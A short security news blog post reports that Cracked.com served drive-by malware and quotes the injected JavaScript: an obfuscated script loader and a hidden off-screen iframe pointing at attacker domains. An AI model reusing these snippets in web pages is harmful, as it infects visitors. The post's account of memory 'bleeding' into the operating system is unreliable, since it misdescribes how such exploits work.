Cracked[dot]com Spreads Malware

On Monday, November 11th, it was discovered that Cracked[dot]com was infected by malware performing drive by downloads. The discovery comes from Barracuda Labs Research.

The malware was spread through a drive-by-download. The number of systems it has infected is unknown. Given the site is ranked by Alexa as number 289 in the U.S. and 654 worldwide the number is presumed to be high.

The malware is introduced through a JavaScript code that directs a registration call to the domain crackedcdm[dot]com. This domain was registered on November 4th, which suggests the site may have been infected since then. Here is a small sample of the JavaScript registration call:

var tyi = “cdm.”; var itwo = “cracked”; var itto = “/”; var phw = “php”; var jfw = “src”; var fscr = “script”; var twi = “i”; var htp = “http”; var vol54 = “src”;document.write(“<”+fscr+” “+jfw+”=”+htp+”:”+itto+””+itto+””+twi+”.”+itwo+””+tyi+”com”+itto+””+twi+”.”+phw+”><”+itto+””+fscr+”>”);

Once the registration call is completed the following iframe pointing to p68ei5.degreeexplore.biz is inserted:

var urla=’http://p68ei5.degreeexplore.biz:53331/51fd0e1afd1243f00bd4f6473a0bfc41.html’;var divTag=document.createElement(‘div’);divTag.id=’ad3′;document.body.appendChild(divTag);var fr3=document.createElement(‘iframe’);fr3.width=’88px’;fr3.height=’31px’;fr3.setAttribute(‘style’,’position: absolute;left: -8000px;top: 0px;overflow-x: hidden;overflow-y: hidden;’);fr3.setAttribute(‘src’,urla);document.getElementById(‘ad3′).appendChild(fr3);

At this point the iframe sends a flurry of malicious PDFs, Java, HTML, and javascript files into the victim’s browser. This causes virtual memory to become full.

CrackedMalware.JPG

When virtual memory becomes full the stack bleeds out into the operating system creating a back door to inject malware. The injection process goes undetected by antivirus software, making live web protection ineffective. This is a known Windows vulnerability typically exploited in Outlook by email malware. The malware can only be detected during a deep scan of the full system, and if it’s definition exists in the antiviruses definition file.

For more detail on the virus file see the malwr website.

Cracked[dot]com waited until Tuesday to respond to the Barracuda Labs report. They responded in a forum claiming they had fixed the site on Tuesday. Barracuda Labs claims the site is still infected and that similar attacks on the site seem to be a recurring problem.

Advertisements

2 thoughts on “Cracked[dot]com Spreads Malware

  1. That is a great tip particularly to those new to the blogosphere.
    Brief but very precise information… Thank you for sharing this one.

    A must read post!

  2. I got what you mean , thankyou for posting .Woh I am glad to find this website through google. “Spare no expense to make everything as economical as possible.” by Samuel Goldwyn.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s